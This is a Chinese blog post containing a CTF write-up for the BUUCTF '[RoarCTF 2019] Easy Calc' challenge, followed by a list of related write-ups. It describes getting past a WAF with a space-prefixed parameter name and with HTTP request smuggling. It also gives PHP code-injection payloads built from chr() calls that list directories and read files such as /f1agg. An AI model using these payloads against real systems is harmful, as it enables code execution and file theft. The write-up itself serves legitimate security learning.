BUUCTF:[RoarCTF 2019]Easy Calc

最新推荐文章于 2023-12-11 20:22:14 发布
最新推荐文章于 2023-12-11 20:22:14 发布
阅读量1.1k 收藏 4
点赞数 3
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/109169796
版权

题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc

在这里插入图片描述
在这里插入图片描述
查看源码

在这里插入图片描述

抓包发现calc.php

在这里插入图片描述

访问http://node3.buuoj.cn:28908/calc.php

在这里插入图片描述

很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法

  • num前添加%20绕过对num的检测
  • HTTP走私之重复Content-Length绕过

首先看下phpinfo(),禁用了一大堆函数

在这里插入图片描述

使用scandir()函数+chr()函数绕过代码执行

/calc.php?%20num=var_dump(scandir(chr(47)))

或者使用glob()函数

/calc.php?%20num=var_dump(glob(chr(47).chr(42)))

根目录发现f1agg

在这里插入图片描述
利用file_get_contents()进行读取

/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

或者其他花式文件读取操作

/calc.php?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=print_r(php_strip_whitespace(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
.......

在这里插入图片描述

HTTP走私之Content-Type重复绕过WAF

在这里插入图片描述

末 初
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
RDRiemann:黎曼张量符号calc
02-11
RDRiemann:黎曼张量符号calc
BUUCTF -Web -[RoarCTF 2019]Easy Calc1 writeup
m0_62851980的博客
04-20 280
考点:php字符串解析漏洞,waf防护方式,php函数的应用 打开靶机,发现是个计算机,输入数字不报错,但如果输入字母: 不返回东西了,不过通过f12可以发现一些信息: 从源码可知, 这个网页有waf防护墙, url网址是clac.php 查看一下calc.php,发现源码: 这里我抓包了,直接在网页传cala.php也能看到源码,分析源码,过滤了很多符号。 WAF防护: 在又拍云的云安全类别中,WAF防护是其中之一的功能,WAF主要防护的是来自对网站源站的动态...
[RoarCTF 2019]Easy Calc 1(PHP字符串解析漏洞)
weixin_45253573的博客
11-17 401
打开环境 右键查看源码 <!DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <
BUUCTF WEB [RoarCTF 2019]Easy Calc
A_dmin的博客
12-13 4899
BUUCTF WEB [RoarCTF 2019]Easy Calc 打开网页是一个计算的!!随便输入可以计算,然后就没啥了,右键源代码: 存在waf,,还有个新的页面!进行访问,看到源代码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ ...
BUUCTF_[RoarCTF 2019]Easy_Calc
qq_45628145的博客
05-01 1277
Easy Calc 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php。 这个代码是先进行一个黑名单判断,然后执行eval()。 过滤了很多字符,而且不能输入num不能是字母,所以我们用%20num进行绕过,利用的是php的字符串解析特性,构...
CTF--BUUCTF-WEB-EasySQL+Easy Calc
qq_42404383的博客
01-13 1410
CTFBUUCTF-WEB-EasySQL+Easy Calc 一、[极客大挑战 2019]EasySQL ​ 题目如图: 简单的注入一下: 把密码长度加长一些试试: 二、Easy Calc–简单的计算器 题目: 分析: 提示有WAF、拿节点content的值去后台运算 解题: 上面行不通、要从WAF着手了(我是不会了) 换个思路、题目还是得做–>> 搜达寺内、...
安恒六月赛DASCTF(web1,2)
weixin_43610673的博客
06-26 1559
简单的计算题-1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from flask import Flask, render_template, request,session from config import black_list,create import os app = Flask(__name__) app.config['SECRET_KEY'] = os.urandom(24) ## flag is in /flag try to ge
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1229
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
CTF---Web---SQL注入---04---F12network+XXF伪造+sqlmap跑文件
qq_22160557的博客
07-29 1092
文章目录前言一、题目描述二、解题步骤1、信息隐藏2、XXF伪造3、sqlmap文件注入三、总结 前言 题目分类: CTF—Web—SQL注入—04—F12network+XXF伪造+ sqlmap跑文件 一、题目描述 题目:Simple_Calc_1,简单计算器 提示:XFF伪造 二、解题步骤 1、信息隐藏 Step1:F12—>查看network,刷新一下,就可以看到/backend/目录, 提示:{“success”:true,“count”:2},是访问次数 2、XXF伪造 Step2:其
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 284
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
literate-calc-mode.el::abacus:针对Mx calc的文字编程
02-04
literate-calc-mode.el::abacus:针对Mx calc的文字编程
Libre Office Calc Pixel Art:将 Libre Office Calc 用于条件格式的像素艺术-开源
06-28
这个简单的项目旨在创建一个 Libre Office calc 模型,将其用作像素艺术画布。 通过使用数字(从 0 到 16)和格式条件(单元格的调用样式)来应用颜色。
matlab代码中fnames-Count_GD:使用GD-Calc软件包生成和管理Matlab仿真
05-27
一个简单的Python代码来计算完成的GD-Calc仿真器。 GD-Calc是基于Matlab的电磁仿真程序包,实现了RCWA算法。 项目的文件夹树如下所示。 project ├── A1 │ ├── run.m │ ├── fb.txt │ └── RawData │ ...
nodejs-ipv6calc:ipv6calc
05-22
nodejs-ipv6calc 安装 npm install ipv6calc 例子 var ipv6calc = require ( './index' ) ; var mac = "00-11-22-33-44-55" ; var ip = "2001:db8::211:22ff:fe33:4455" ; console . log ( ip ) ; //2001:db8::211...
UNCTF 2021---Web wp
3tefanie丶zhou的博客
11-29 2505
【人间事,其实好坏之别,往往就只差那么一两句话,就可以好坏颠倒。气头上,多了一两句不该有的重话反话,平日里,少了一两句宽慰人心的废话好话。】
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 452
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1291
BUUCTF [RoarCTF 2019]Easy Calc1 WP
【CTF】SZTU课内练习WP1
最新发布
2301_76885465的博客
12-11 934
2.使用“python sqlmap.py -r “1.txt” --level 3 --batch”进行探测注入,然后使用“python sqlmap.py -r “1.txt” --level 3 --batch --dbs”获取数据库,然后依次获取表,字段,字段的内容,最后得到flag.2.进行抓包,将Get请求改为Post请求,并按要求将flag=输到8位数以上,得到。1.登录demo账户,发现有flag,点击发现没有权限查看,因此考虑越权访问。1.对IP进行扫描,发现/backend。
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志,我们就可以提交它来获得得分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值